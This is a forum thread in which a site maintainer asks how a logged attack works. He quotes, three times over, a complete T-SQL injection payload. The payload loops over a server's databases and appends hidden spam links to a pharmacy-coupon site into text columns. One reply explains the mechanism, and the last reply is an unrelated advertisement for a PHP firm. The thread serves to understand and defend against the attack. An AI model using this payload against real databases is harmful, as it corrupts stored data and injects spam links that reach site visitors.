What / how are these people trying to hack my site?
-
Someone is (repeatedly) trying to hack a site I look after - unsuccessfully, I might add, as I do check and sanitize all requests - but I am interested in knowing how... they are requesting a page URL with the following appended:
';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''transfer prescription coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.liberitutti.info''+char(47)+''page''+char(47)+''viagra-coupons-from-pfizer"''+char(62)+''''''+case abs(checksum(newid()))%253 when 0 then ''''liberitutti.info'''' when 1 then ''''liberitutti.info'''' else ''''2016 viagra coupon'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra coupons and discounts''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%25varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
It looks to me as though they're hoping to inject some code into the page to either redirect users or at least display a link to their site - but how does this work? And what's with the 'update table name checksum' stuff about? Just curious...
"I'm never quite so stupid as when I'm being smart." - Linus van Pelt. "If you were as smart as you think you are, you wouldn't think you were so smart!" - Charlie Brown.
-
Someone is (repeatedly) trying to hack a site I look after - unsuccessfully, I might add, as I do check and sanitize all requests - but I am interested in knowing how... they are requesting a page URL with the following appended:
';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''transfer prescription coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.liberitutti.info''+char(47)+''page''+char(47)+''viagra-coupons-from-pfizer"''+char(62)+''''''+case abs(checksum(newid()))%253 when 0 then ''''liberitutti.info'''' when 1 then ''''liberitutti.info'''' else ''''2016 viagra coupon'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra coupons and discounts''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%25varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
It looks to me as though they're hoping to inject some code into the page to either redirect users or at least display a link to their site - but how does this work? And what's with the 'update table name checksum' stuff about? Just curious...
"I'm never quite so stupid as when I'm being smart." - Linus van Pelt. "If you were as smart as you think you are, you wouldn't think you were so smart!" - Charlie Brown.
That looks like T-SQL injection attempt. Looking at the content, they are trying to inject spam comments or something like that and are probably randomly trying sites hoping to find a vulnerable system, whether it be a joomla or wordpress or a.n.other. I used to get this **** all the time when my website was up (joomla V1.25 or whatever it was), and used to manually have to delete hundreds and thousands of comments waiting in moderation. The fact the ISP screwed an update and killed my virtual server probably did me a favour! Edit: First they set up a some variables (Declare), one of them is a cursor (database positioning), next they do a search for and iterate all the databases defined in the system and then begin a process of simply adding content to the various columns. If you break the statement down into a readible structure, and then compares the keywords against the T-SQL specification, you will be able to work out what is going on. e.g. variables named with a single @ are user variables, and ones referenced by double @@ are reserved by the database language for system variables, e.g. @@rowcount is used to inform how many rows are updated/changed etc. following a command.
Dave Find Me On:Web|Facebook|Twitter|LinkedIn Folding Stats: Team CodeProject
-
Someone is (repeatedly) trying to hack a site I look after - unsuccessfully, I might add, as I do check and sanitize all requests - but I am interested in knowing how... they are requesting a page URL with the following appended:
';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''transfer prescription coupon ''+char(60)+''a href="http:''+char(47)+char(47)+''www.liberitutti.info''+char(47)+''page''+char(47)+''viagra-coupons-from-pfizer"''+char(62)+''''''+case abs(checksum(newid()))%253 when 0 then ''''liberitutti.info'''' when 1 then ''''liberitutti.info'''' else ''''2016 viagra coupon'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra coupons and discounts''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%25varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
It looks to me as though they're hoping to inject some code into the page to either redirect users or at least display a link to their site - but how does this work? And what's with the 'update table name checksum' stuff about? Just curious...
"I'm never quite so stupid as when I'm being smart." - Linus van Pelt. "If you were as smart as you think you are, you wouldn't think you were so smart!" - Charlie Brown.
Endive Software a leading PHP Web development company in USA. Hire PHP developer at affordable price. send your requirement : http://www.endivesoftware.com/get-a-quote.php Skype : endive-consulting Email : Sales@endivesoftware.com